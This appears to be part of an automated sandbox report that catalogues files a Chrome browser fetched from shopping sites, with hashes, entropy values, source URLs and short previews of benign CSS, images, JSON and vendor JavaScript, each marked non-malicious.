                                                                                                                                                                                    Size (bytes):99418
                                                                                                                                                                                    Entropy (8bit):5.069049337899779
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:WmDLd923IydsTKniA+N2AirPN+voaTtflkp9lxq044agammGUpxIRAjNXwl7h:L923IydsTKq23LoJlZmmGUpxIRAU
                                                                                                                                                                                    MD5:D469E5E76D7DDB06A54F6C8B6E75D3C9
                                                                                                                                                                                    SHA1:045FE43FF23824939BBF7209943B1D52A6174635
                                                                                                                                                                                    SHA-256:8C47150917FD62564A60C4B5A8E9D79E3681F47E3CB26F0C3D205E0B7F92CF74
                                                                                                                                                                                    SHA-512:DFDF96590FC2584928C734694853538E96A62A340A6467ABB223E8B4BD983FF100B69CD5FADE7404257499B224ED8384F72467E96D7E7A9A3F9F60D5056197E6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/main.css?v=159110284673253387411730157980
                                                                                                                                                                                    Preview:@charset "UTF-8";*,*:before,*:after{box-sizing:border-box}.announcment_logos .main-menu-bar{display:flex;align-items:center}.announcment_logos .main-menu-bar a{padding:0}.pb-6.flex.flex-col.flex-auto.items-start{background:#fff}.card.color-scheme.color-scheme--1.relative.flex.flex-col.h-full{border:1px solid #00000005;box-shadow:0 0 4px 4px #00000005}ul.slider__grid{padding:10px}.section__block--countdown.text-overlay__block{display:flex;flex-direction:column;justify-content:center;align-items:center;background:#fff}.section__block--countdown.text-overlay__block a{background:#d90023;color:#fff;width:200px;height:50px;display:flex;justify-content:center;align-items:center;margin-top:20px;font-size:16px;font-weight:700;letter-spacing:.1px}.section__block--countdown.text-overlay__block .countdown__number{border-radius:50%;background:#d90023}#productSpecifications{background:#5a5a5a;justify-content:space-evenly!important;align-items:center!important;gap:20px;padding:100px 0}#productSpecifi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18051
                                                                                                                                                                                    Entropy (8bit):3.894656777946961
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:tBO9VYS0k6Lf1dABBkB1Q5xk6Lf1dABBkB1Q5M7xJ:tET9341dABGB6y41dABGB6QxJ
                                                                                                                                                                                    MD5:FC8646771DEAC0A42BAAECDBC6E15573
                                                                                                                                                                                    SHA1:39F8D3FDCD1EB046B87D5DFDFBC12B141F341CF0
                                                                                                                                                                                    SHA-256:C37EB0F5EAD29F7F0362FA0130E9877FD216EAFAF3A9CA9A3D5CB2F1DECA314E
                                                                                                                                                                                    SHA-512:1614AD52951B6EB770D49776ED5A602739B044344188A3717C294F400CA3198AEA1148451BDEE5E6E0D97920EC0844FAB326669E5F5B5B6F87B11D94472E80DF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10142024_Domestic_Bento1.svg?imwidth=1920
                                                                                                                                                                                    Preview:<svg width="571" height="212" viewBox="0 0 571 212" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_558_6656)">.<rect x="176" y="-12" width="136" height="136" rx="68" fill="#832E00"/>.<path d="M226.874 28.636H230.026V37.5H226.874V36.092C226.122 37.196 224.81 37.82 223.226 37.82C220.65 37.82 219.258 36.172 219.258 33.852V28.636H222.41V33.644C222.41 34.796 223.066 35.468 224.266 35.468C225.322 35.468 226.202 34.972 226.874 33.884V28.636ZM239.061 37.82C237.445 37.82 236.197 37.196 235.413 36.188V40.7H232.261V28.636H235.413V29.932C236.197 28.94 237.445 28.3 239.061 28.3C241.845 28.3 243.765 30.124 243.765 33.068C243.765 35.996 241.845 37.82 239.061 37.82ZM238.181 30.716C237.109 30.716 236.133 31.084 235.429 31.98V34.14C236.133 35.036 237.109 35.404 238.181 35.404C239.845 35.404 240.773 34.54 240.773 33.068C240.773 31.58 239.845 30.716 238.181 30.716ZM256.188 34.908L256.716 36.972C255.916 37.516 254.668 37.836 253.596 37.836C251.58 37.836 250.06 36.732 250.06 34.588
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1882
                                                                                                                                                                                    Entropy (8bit):7.041008393532369
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:/Il/XflUgXHN60Q4KnDgSjC01bjvXCFWmGVv:/Il/XPXtB+DBjx1bRmO
                                                                                                                                                                                    MD5:1D75589E4C8850D1031492E830C7B448
                                                                                                                                                                                    SHA1:1F6084B1C61704662001E98018FF39619634E982
                                                                                                                                                                                    SHA-256:48E83DD1050F6745111CC341FC37A286455F3B290C49BB1A0FB508BC82D98D44
                                                                                                                                                                                    SHA-512:ED8F862790B2020AE3B22F15568EBAB55B78F41478B7BE10423E697A1959BB7E017F221672715ED2C8233C62C9F517F91C64EA5149FB3FC7ADC093F2C46CD636
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_bebc9b2e-64d6-4eda-9f64-1bef639ddc1f.jpg?v=1729325107&width=80
                                                                                                                                                                                    Preview:RIFFR...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p....*P.P.>1..C.!!.... ....f.\B..0.4.y`)}x;].Gtt.{..a..........l ....7.I...v.a.#..G.`e..B..!=.J...D..M.....q..BOw.BC....k.Hc......I..i8s.../=..4...es..wc]..(%..XQ5BUi...|I.y.j..l:yh............+.qz&u[..{../..2...P.Rq....-..=....vJV.u.....{.L..x.s.C.P.,..]9.8..6%..N!....'.w.1.o*....%.....{....U.>.....`...s/|.)Q.#..G.:......2L>V..gLQ...~.6.,..........t.....K.'..A...N.....[{.....s]..H.z.u..UA.c6.5......*..J>..V......U@..UX..1...E...#*.!?....@.;R.2]..G..oH.'/d..#.J.be=.......?7a.K.r..,.....u..Je.".0.P.zb...&Ko\
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2007)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2008
                                                                                                                                                                                    Entropy (8bit):5.314246314994638
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:Jm27Lgfe43P/mrkK9Q/P5/wzmJsr2EqfIALAYc62IN81xzXMCHTSCHy1rSHzHu:Jm2Am43P/mYK8P1m3y1j2KwxzbhawzHu
                                                                                                                                                                                    MD5:CD5BAF4E5501957D38FCAD8B67181732
                                                                                                                                                                                    SHA1:65584D5F1A39FCEA9696377D917C1639C239F11C
                                                                                                                                                                                    SHA-256:E0D53C45965E0E1BD05A41AF2EB7C89E50DF3B07EC5E3E101572D737A302EF43
                                                                                                                                                                                    SHA-512:03CC7FBD553E9AA3AE10862A848CF46E8618F929BD256619E45CEBACC2708C4F0B668BF651279AACD11873F2A962865D0EAB0D249925C57E5543E40324D52712
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var R=Object.create;var I=Object.defineProperty;var S=Object.getOwnPropertyDescriptor;var x=Object.getOwnPropertyNames;var y=Object.getPrototypeOf,C=Object.prototype.hasOwnProperty;var l=(e,c)=>()=>(e&&(c=e(e=0)),c);var b=(e,c)=>()=>(c||e((c={exports:{}}).exports,c),c.exports);var A=(e,c,a,i)=>{if(c&&typeof c=="object"||typeof c=="function")for(let r of x(c))!C.call(e,r)&&r!==a&&I(e,r,{get:()=>c[r],enumerable:!(i=S(c,r))||i.enumerable});return e};var L=(e,c,a)=>(a=e!=null?R(y(e)):{},A(c||!e||!e.__esModule?I(a,"default",{value:e,enumerable:!0}):a,e));var m=(e,c,a)=>new Promise((i,r)=>{var s=t=>{try{n(a.next(t))}catch(h){r(h)}},o=t=>{try{n(a.throw(t))}catch(h){r(h)}},n=t=>t.done?i(t.value):Promise.resolve(t.value).then(s,o);n((a=a.apply(e,c)).next())});var u,_=l(()=>{u="WebPixel::Render"});var k,g=l(()=>{_();k=e=>shopify.extend(u,e)});var T=l(()=>{g()});var O=l(()=>{T()});var N=b(f=>{"use strict";O();var w=/(clickref)=([0-9A-Za-z]+)/,d="_pz_clickref",P=5e3,p=e=>m(f,null,function*()
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (22272)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):22273
                                                                                                                                                                                    Entropy (8bit):5.400660167493515
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:MZ6ZDMjT0ve3sj/fPs0hk66xtiIzg+EZZ+F2XMHe4mDz2iWoLdcIAudyPxEdKGp5:MoZDMjT0m3sj/fVhkBtib+hUMHe4mH/v
                                                                                                                                                                                    MD5:BDA4126BE2F960B9213BE97541A4E5AC
                                                                                                                                                                                    SHA1:CD3F67EB24AD80EA46DCE1482EC3805EE89D8400
                                                                                                                                                                                    SHA-256:E527B2F39205633FEA53C6BEC0B2065DF82C4114F56F4E950BF9A114867F1FBB
                                                                                                                                                                                    SHA-512:1E7C80F52100F7C6BC09FF27CC969B18232D20C279E3215CD9B6A29633E4191A57AF4363193EAF15AD9BCAFCA1A71BED09DD065035D136C43859D6D66D0E6234
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/component-ShopPayVerificationSwitch.BlUYB-_q.js
                                                                                                                                                                                    Preview:import{hc as He,o as ue,cH as ge,r as ze,m as Pe,l as te,T as V,cI as de,bw as We,bB as Ge,bF as ve,h as B,q as b,w as we,a as C,eC as qe,A,hd as Ke,he as je,y as g,ae as me,hf as Ye,ab as Ce,dg as Qe,hg as Je,hh as Xe,bc as Ie,hi as Me,d as ae,br as ie,aO as be,hj as Le,hk as X,hl as Ae,f9 as ce,hm as ee,hn as W,ho as De,hp as q,hq as ne,hr as le,hs as Ze,ht as oe,hu as Ne,hv as et,cE as U,v as tt,bO as nt,e as ot,c0 as st,cx as rt,cB as at,hw as it,hx as xe,hy as ct,hz as ut,by as dt,al as lt,hA as ye}from"./app.DfgMZONA.js";import{M as R}from"./DeliveryMethodSelectorSection.HuQ_vE9w.js";import{u as ht,p as G,S as $,A as J,a as ft,M as Te,b as pt}from"./publishMessage.CX0yXme-.js";import{a as mt,u as yt,U as Se}from"./useUnauthenticatedErrorModal.AwvSMfsF.js";import{u as St,a as Ue,P as Et,C as _t,i as se,b as kt,c as Z,d as he,e as Ve,f as fe,g as gt,A as Pt,h as vt,r as wt,R as Ct,j as It}from"./index.BImg1G4g.js";import"./LegacyVaultedShippingMethods.CLlWtWZU.js";import"./Rollup.B
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1006
                                                                                                                                                                                    Entropy (8bit):4.836413942661106
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2oUChUCKwVbV8Hno8/TnUn+fmLoaiuHc1deB/:dZhZKhHnoibUn2mLU1deB/
                                                                                                                                                                                    MD5:6E0DC54411BDE95A291A6933C2C63209
                                                                                                                                                                                    SHA1:F30E131D08E18B436566A0DD51FFC008E3AE42EA
                                                                                                                                                                                    SHA-256:3B20F1DC4E3B8C38FCB0F84DE3F9379124802EA313DAA293382E71DA116042B8
                                                                                                                                                                                    SHA-512:DB673798EA8D75A153ADCF2EADFFF0C21184CB6862F3A6D642948C3AB1442E1FBF64F217D5761BC7F5207355C065518ED6B15AF4E1DED19DD72A7F090FF5D147
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://assets.tapcart.com/__tc-ck-loader/index.js?appId=m3Lkr2oxDy&environment=production&shop=26f4aa-09.myshopify.com
                                                                                                                                                                                    Preview:(function () {. const { currentScript } = document;. const script =. new URL(currentScript.src) || new URL(currentScript.getAttribute("src"));.. const appId = script.searchParams.get("appId");. const environment = script.searchParams.get("environment");.. const srcUrls = {. local: "http://localhost:3005/dist/tc-plugins.es.js", // local dev server URL defined in vite.config.js. staging:. "https://unpkg.com/tapcart-capture-kit@staging/dist/tc-plugins.es.js",. production:. "https://unpkg.com/tapcart-capture-kit@production/dist/tc-plugins.es.js",. };. const srcUrl = srcUrls[environment] || srcUrls.production;.. window["tapcartParams"] = { appId, environment };.. // Create a new script element with type module. const moduleScript = document.createElement("script");. moduleScript.type = "module";. moduleScript.src = srcUrl;. document.head.appendChild(moduleScript);.. moduleScript.onerror = function () {. console.error("The script failed to load.");. };
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18051
                                                                                                                                                                                    Entropy (8bit):3.894656777946961
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:tBO9VYS0k6Lf1dABBkB1Q5xk6Lf1dABBkB1Q5M7xJ:tET9341dABGB6y41dABGB6QxJ
                                                                                                                                                                                    MD5:FC8646771DEAC0A42BAAECDBC6E15573
                                                                                                                                                                                    SHA1:39F8D3FDCD1EB046B87D5DFDFBC12B141F341CF0
                                                                                                                                                                                    SHA-256:C37EB0F5EAD29F7F0362FA0130E9877FD216EAFAF3A9CA9A3D5CB2F1DECA314E
                                                                                                                                                                                    SHA-512:1614AD52951B6EB770D49776ED5A602739B044344188A3717C294F400CA3198AEA1148451BDEE5E6E0D97920EC0844FAB326669E5F5B5B6F87B11D94472E80DF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="571" height="212" viewBox="0 0 571 212" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_558_6656)">.<rect x="176" y="-12" width="136" height="136" rx="68" fill="#832E00"/>.<path d="M226.874 28.636H230.026V37.5H226.874V36.092C226.122 37.196 224.81 37.82 223.226 37.82C220.65 37.82 219.258 36.172 219.258 33.852V28.636H222.41V33.644C222.41 34.796 223.066 35.468 224.266 35.468C225.322 35.468 226.202 34.972 226.874 33.884V28.636ZM239.061 37.82C237.445 37.82 236.197 37.196 235.413 36.188V40.7H232.261V28.636H235.413V29.932C236.197 28.94 237.445 28.3 239.061 28.3C241.845 28.3 243.765 30.124 243.765 33.068C243.765 35.996 241.845 37.82 239.061 37.82ZM238.181 30.716C237.109 30.716 236.133 31.084 235.429 31.98V34.14C236.133 35.036 237.109 35.404 238.181 35.404C239.845 35.404 240.773 34.54 240.773 33.068C240.773 31.58 239.845 30.716 238.181 30.716ZM256.188 34.908L256.716 36.972C255.916 37.516 254.668 37.836 253.596 37.836C251.58 37.836 250.06 36.732 250.06 34.588
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1183
                                                                                                                                                                                    Entropy (8bit):4.746633951963653
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIflqyLHwrhHALiRoLhGqjtALQiILBEAL7qsLC0LUqVLKAVLV:YB3LUHALNLXtALILBtLjLHLJLFLV
                                                                                                                                                                                    MD5:E8F3E5C461CECE9E5FB19724CC2BA57C
                                                                                                                                                                                    SHA1:FB28C6B5C7A1AD7054B641441C9BA09F5532D804
                                                                                                                                                                                    SHA-256:5FFE20CD92F72E27B6D74FA4502875EEE51AF05809131E9DFDC6171F0DABCB71
                                                                                                                                                                                    SHA-512:82A23340F97A4F7950ED682AB2637857293CDE2DE82E56D0B3223AC6A507F930DA7656FB54DC1530E44E24A106B5A7A467BF8C9955660C702F286F7446CE7988
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/20000656%2C31945954%2C24331708%2C30886521%2C36369010%2C37353141%2C34669053%2C34061828%2C33240501%2C38408327/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"33240501","rollup":{"average_rating":4.47,"rating_count":32,"review_count":32,"answered_questions":0}},{"page_id":"34669053","rollup":{"average_rating":4.66,"rating_count":99,"review_count":99,"answered_questions":0}},{"page_id":"34061828","rollup":{"average_rating":4.84,"rating_count":214,"review_count":214,"answered_questions":0}},{"page_id":"36369010","rollup":{"average_rating":4.07,"rating_count":57,"review_count":57,"answered_questions":0}},{"page_id":"37353141","rollup":{"average_rating":4.86,"rating_count":7,"review_count":7,"answered_questions":0}},{"page_id":"38408327","rollup":{"average_rating":5.0,"rating_count":3,"review_count":3,"answered_questions":0}},{"page_id":"20000656","rollup":{"average_rating":4.72,"rating_count":166,"review_count":166,"answered_questions":0}},{"page_id":"24331708","rollup":{"average_rating":4.79,"rating_count":191,"review_count":191,"answered_questions":0}},{"page_id":"30886521","rollup":{"average_rating":4
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18732
                                                                                                                                                                                    Entropy (8bit):7.9529387544320365
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:aRttQ1fCYu2VKcpM6y1ofl82dZSBDxG7JRQx2eeBSSkKHLsXOHg7npO7h2ehZy8S:wY/4ilLZY2eeBSSkKsXPc3u1pi+2bS
                                                                                                                                                                                    MD5:4E5626C6E983CD0C70D44D21CA0A00F7
                                                                                                                                                                                    SHA1:084A86C7245BDC5A5EC17D2E4C4639081F555415
                                                                                                                                                                                    SHA-256:A6E7ADC0BE6932A9DBC770028C71E422D775AEF136EAEE3662C2CC65B0C3FAA4
                                                                                                                                                                                    SHA-512:683D7A12ACCD053320A8804B0D5048246FD103E778A93B4D9273A7D9BCB485F197F9A4D3D371D54C29C3C833AA2DBF8DCBDD6F90BD4304CDAF729963B6A7E981
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/06272024-MOPS-Category-Outdoor.png?v=1719612969&width=320
                                                                                                                                                                                    Preview:RIFF$I..WEBPVP8X....8...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.......m.Ir...=."".1U.J.{.k/.GN...l..6...3....Uv..9..%ps~s.@..C..W....H.F..s.. H...b..R.A.f..y..Q3.>.........m.P.....q$....."9.W...&7D>.ki....x.cN....\f..l%. sff{....~R....i.?......)..b...@n..n...M.Q.'"F.0dP....zP...3........hW...G....HR$.DH...c..U?..T.H.-k.>Y.......s..N..g.k]k.m..|o...WW..\*...{*.$$.{.....\.f...3....M^h.|..;.Ix...).m=o.?.m..w.q...X.C...q<../N...f.V...W..u......pk..X..FG.`...!|..'>M...R.}.........c3..83D...3?5..sH]2*.v...F.u0.pF.....{.?...U...jwm......VvA..=.uF0..:..>...'......5...D'..C
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3169)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3170
                                                                                                                                                                                    Entropy (8bit):5.350368444732153
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:cJBq2g/1tDpiGEPcrbEFc+Ob4wQJD0zXj4zKe:cvq2g95E0ceNBQuiKe
                                                                                                                                                                                    MD5:7791DE54D1ED9836A0AA38795DF4015A
                                                                                                                                                                                    SHA1:8A9BD7BFDC80B7693F87C730FE8580F8A42E03DC
                                                                                                                                                                                    SHA-256:4F2035786A00622B6E532D081403B9482EEFD1BE284BFB87E042209AD17BE700
                                                                                                                                                                                    SHA-512:CF77BA47102AD63189F631580997E67AF4A8BD9468F1A4C8E078562C4CA5B9FF795461FBCBB760A84CA03AEA049C9F3E248124C1ECF117C62D84A933CA458305
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/publishMessage.CX0yXme-.js
                                                                                                                                                                                    Preview:import{bu as _,bv as I,l as C,bw as w,bx as L,o as F,by as U,bz as b,bA as W,bB as f,bC as v,bD as R,bE as M,m as x,k as H,q as k,bF as B,y as D}from"./app.DfgMZONA.js";const E=_.Control,G=_.UnauthenticatedCheckout,V=_.UnauthenticatedCheckout,Q=[_.UnauthenticatedCheckout];function Y(){const{currentUrl:e}=I(),{type:a}=C(),t=e.searchParams.get(w),[d,o]=L([R,M]),l=F()!=null,i=U(),u=[b.DraftOrder,b.Simulated],c=W(e.search),n=c&&d||o,y=![f.ShopPayAsPaymentMethod,f.ShopPayInstallmentsAsPaymentMethod].includes(t),h=i&&y&&!u.includes(a)&&(!l||n),p=v({disabled:!h,key:"shop_pay_new_signup_login_variant",variants:Object.values(_)});return h?p||(c?d?V:E:o?G:E):E}const q=()=>{const{myshopifyDomain:e}=x(),{checkoutSessionIdentifier:a}=C(),t=H();return{exchangeSessionTokenForCookie:k(async({token:o,origin:l,analytics_trace_id:i,in_checkout_profile_preview:u})=>{const{primary:c}=B(),n=new URLSearchParams({token:o,origin:l,shopify_domain:e});a&&n.set("checkout_token",a),i&&n.set("analytics_trace_id",i)
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4717), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4717
                                                                                                                                                                                    Entropy (8bit):5.0231454692467095
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:x9yTUdsZTmzDXHyHkz/93yN1X6VA/+fO/HYU1:nyTUCSDHyHW/93yNtmAm2/N
                                                                                                                                                                                    MD5:9A39012D8B21FD48BC886557A71DE05B
                                                                                                                                                                                    SHA1:0513D36ADD1A40C327DCEDBF6740400143BDF3E7
                                                                                                                                                                                    SHA-256:2432D4D714F569FB026AC1272B385CC0C13A5C820AB4AE88E907B4DCC13C8F9D
                                                                                                                                                                                    SHA-512:BA6D35BDDF90FF260C3388C247EF6ED9F97938471F2D6FBF97E741FC5809B7FAECACA6454958AC4DE21459CFF2A6C6A8E52EE4EAF4915198F4264F7F14C1C8FC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}const t=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-web-sdk-script")));const s=new URLSearchParams(t.search);const r=Object.fromEntries(s.entries());if(!document.querySelector("script[src*='braze.min.js']")&&!document.querySelector("script[src*='braze.no-amd.min.js']")&&!document.querySelector("script[src*='appboy.min.js']")&&!document.querySelector("script[src*='appboy.no-amd.min.js']")&&!window.braze&&!window.appboy){+function(e,t,s,r,o){e.braze={};e.brazeQueue=[];for(var n="BrazeSdkMetadata DeviceProperties Card Card.prototype.dismissCard Card.prototype.removeAllSubscriptions Card.prototype.removeSubscription Card.prototype.subscribeToClickedEvent Card.prototype.subscribeToDismissedEvent Card.fromContentCardsJson ImageOnly CaptionedImage ClassicCard ControlCard ContentCards ContentCards.prototype.getUnviewedCardCount Feed Feed.prototyp
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (8298), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):8298
                                                                                                                                                                                    Entropy (8bit):5.180172095910542
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:KwjyhENneOeca4vfv4ovaRViSpS7lHW2SQdIf6:KWeya4vfQovyV+lHTU6
                                                                                                                                                                                    MD5:125C7F6C7E3F3B32CA1A15AFBBC6935E
                                                                                                                                                                                    SHA1:7066F246643259315FB97D3E85F48F4D471AB27E
                                                                                                                                                                                    SHA-256:61FA9E0A912C675E178777D2B27F6CBD482F8912A6B0AA31FA3515985A8CD626
                                                                                                                                                                                    SHA-512:15768054FE3D5EFEAD6DD96F73D54F3A935DDC246A8D727960371C543CFF923162C7530B8F47C4757F0A1028F9C0961DEE5D9D2FA983AE93434640C32F4A3020
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shopifycloud/shopify/assets/shop_events_listener-61fa9e0a912c675e178777d2b27f6cbd482f8912a6b0aa31fa3515985a8cd626.js
                                                                                                                                                                                    Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(t,n,r){return n&&e(t.prototype,n),r&&e(t,r),t}}(),n=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},r=function(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)};e((function(e,a){"use strict";function o(e,t){if(e.length!=t.length)throw Error("Payload body and response have different number of items");e.forEach((function(e,n){var r=1;try{r=parseInt(t[n].quantity,10)||1}catch(e){console&&console.warn&&console.warn("[shop_events_listener] Error in handleBulkItemCartAddResponse: "+e.message)}s(e,r)}))}function i(e,t){for(var n=new Array(t),r=0;r<t;r++)n[r]={};var a=!0,o=!1,i=void 0;try{for(var c,s=dec
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1934
                                                                                                                                                                                    Entropy (8bit):7.076220607034739
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:DIl/XflrXeqwo6aJAn77ldBetFe0PUTogJOxXLJ:DIl/XxOaynHldEtjPngJeXd
                                                                                                                                                                                    MD5:31F2915A96684AC154B15B5AD61276EF
                                                                                                                                                                                    SHA1:CB94DCB0E8D87D49C898150266F197893CB814B0
                                                                                                                                                                                    SHA-256:887FAF0CC681941ED915777025B6481B52E068BBDFBDD9E6DD7AC7B3CB29AA51
                                                                                                                                                                                    SHA-512:3495AC57B2A5A41909495B5796732FC80946B4480D05A8867D0D175EEE6A426A8B21E9376F39F21DBB055EA4631501C2EAD60761752F8F2CDAE1E987686744BB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_4a8ae2b6-5b97-4fe2-ad67-d28fb3271a71.jpg?v=1729325334&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C.!!.... ......P.o..*...G......&...An...?...>G4.....g..==..{.I;.X[z. "...U........Q...ZE.....W..Ns"n.....=.Uz. {d....Dt.^...Pd;g....Io(...<.;#'h:|~.p.4.w..l.h..o..4.....2..A~"...p.0?t..$U..1...r....x.0.!I0..5.....R... 5..m........<..9..^s.`.>f2/..6t...d......TnN.....n,X......Wk.u..!-;..ND.9Vf.......L.........V.w4...Xq...~..}~.....Nb.NG.d...h..t.U...u._.'....7.B...#.7....6q.......]T$.%...[......O.i.....#.1S.O,V.....I22^..K...PY....RHrU..q...l*..}.....4GJ.[.@....E:.&K<.Fz..i.......=Gs..Ts6N$..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2012
                                                                                                                                                                                    Entropy (8bit):7.141942870602106
                                                                                                                                                                                    Encrypted:false
